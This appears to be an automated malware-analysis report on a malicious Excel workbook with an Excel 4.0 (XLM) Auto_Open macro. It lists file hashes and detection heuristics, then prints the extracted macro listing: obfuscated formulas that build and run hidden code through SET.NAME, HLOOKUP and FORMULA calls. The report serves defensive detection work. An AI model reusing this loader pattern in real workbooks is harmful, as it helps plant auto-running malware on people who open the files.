Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 618a51c89b1a9a0b…

MALICIOUS

Office (OLE)

36.0 KB Created: 2020-11-25 10:40:33 Authoring application: Microsoft Excel First seen: 2021-02-09
MD5: e17302c48c47d04fe6da0debf88e8831 SHA-1: 40d0161fccbc2d77c4a2643f27e132776c96d130 SHA-256: 618a51c89b1a9a0bdb463a132c9a1eea984cb1310f01a7e79d0616a55503c4d1
140 Risk Score

Heuristics 3

  • Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAME
    oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
  • XLM Auto_Open with dangerous formula APIs critical OLE_XLM_DANGEROUS_FN
    Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
  • Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPEN
    Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
xlm_macros.txt xlm-macro oletools.olevba.extract_all_macros (XLM macro listing) 6398 bytes
SHA-256: 105f6d06f07c058b095ed60e78a9aae1140745226e8f5d7650b80078127ac519
Preview script
First 1,000 lines of the extracted script
' 0085     14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible -  Sheet
' 0085     12 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible -  bYT
' 0018     23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d  Sheet!C172 
' 0018     25 LABEL : Cell Value, String Constant - CsZosmMZkh len=0 
' 0018     24 LABEL : Cell Value, String Constant - drIXwZASO len=0 
' 0018     26 LABEL : Cell Value, String Constant - EtIQBMkywgP len=0 
' 0018     20 LABEL : Cell Value, String Constant - FnskV len=0 
' 0018     21 LABEL : Cell Value, String Constant - fvfpvL len=0 
' 0018     26 LABEL : Cell Value, String Constant - iNdhBdCIHcJ len=0 
' 0018     26 LABEL : Cell Value, String Constant - IOhPDlwKNUJ len=0 
' 0018     26 LABEL : Cell Value, String Constant - KALLEhrdxEZ len=0 
' 0018     21 LABEL : Cell Value, String Constant - kHYReq len=0 
' 0018     26 LABEL : Cell Value, String Constant - QckcseXdFvF len=0 
' 0018     27 LABEL : Cell Value, String Constant - QQCnZrbWtjOO len=0 
' 0018     21 LABEL : Cell Value, String Constant - TrzoMp len=0 
' 0018     23 LABEL : Cell Value, String Constant - tXIHeEaP len=0 
' 0018     25 LABEL : Cell Value, String Constant - usNwROCikt len=0 
' 0018     26 LABEL : Cell Value, String Constant - VKGKqJWVFJm len=0 
' 0018     21 LABEL : Cell Value, String Constant - WWYJYL len=0 
' 0018     27 LABEL : Cell Value, String Constant - xDZrMZmsyXxg len=0 
' 0018     25 LABEL : Cell Value, String Constant - yGbUyvJtTk len=0 
' 0018     23 LABEL : Cell Value, String Constant - YgDNSeAK len=0 
' 0018     21 LABEL : Cell Value, String Constant - zYqVBO len=0 
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
'  bYT,C83,"SET.NAME("TrzoMp",VALUE("0"))",""
'  bYT,C85,"SET.NAME("WWYJYL",TrzoMp)",""
'  bYT,C90,"SET.NAME("YgDNSeAK",TrzoMp)",""
'  bYT,C93,"SET.NAME("FnskV",COUNTA(CsZosmMZkh))",""
'  bYT,C98,"SET.NAME("kHYReq",COUNTA(tXIHeEaP))",""
'  bYT,C103,[],""
'  bYT,C107,"SET.NAME("VKGKqJWVFJm","")",""
'  bYT,C112,"WWYJYL",""
'  bYT,C117,"SET.NAME("yGbUyvJtTk",HLOOKUP("*",CsZosmMZkh,WWYJYL,FALSE))",""
'  bYT,C119,"fvfpvL",""
'  bYT,C123,"SET.NAME("zYqVBO",TrzoMp)",""
'  bYT,C126,[],""
'  bYT,C129,"zYqVBO",""
'  bYT,C131,"EtIQBMkywgP",""
'  bYT,C135,"drIXwZASO",""
'  bYT,C137,"xDZrMZmsyXxg",""
'  bYT,C141,"SET.NAME("iNdhBdCIHcJ",VALUE(HLOOKUP("*",tXIHeEaP,xDZrMZmsyXxg,FALSE)))",""
'  bYT,C146,"QckcseXdFvF",""
'  bYT,C148,"VKGKqJWVFJm",""
'  bYT,C151,"YgDNSeAK",""
'  bYT,C153,NEXT(),""
'  bYT,C156,"KALLEhrdxEZ",""
'  bYT,C159,"SET.NAME("f",INT(T(FORMULA(T(VKGKqJWVFJm)&"",""&T(KALLEhrdxEZ)))))",""
'  bYT,C163,"IOhPDlwKNUJ",""
'  bYT,C165,NEXT(),""
'  bYT,C170,RETURN(),""
'  bYT,C197,"SET.NAME("usNwROCikt",C83)",""
'  bYT,C202,"CsZosmMZkh",""
'  bYT,C207,"SET.NAME("tXIHeEaP",R71C13)",""
'  bYT,C212,"SET.NAME("IOhPDlwKNUJ",220)",""
'  bYT,C217,"SET.NAME("QQCnZrbWtjOO",3)",""
'  bYT,C219,usNwROCikt(),""
'  bYT,C220,HALT(),""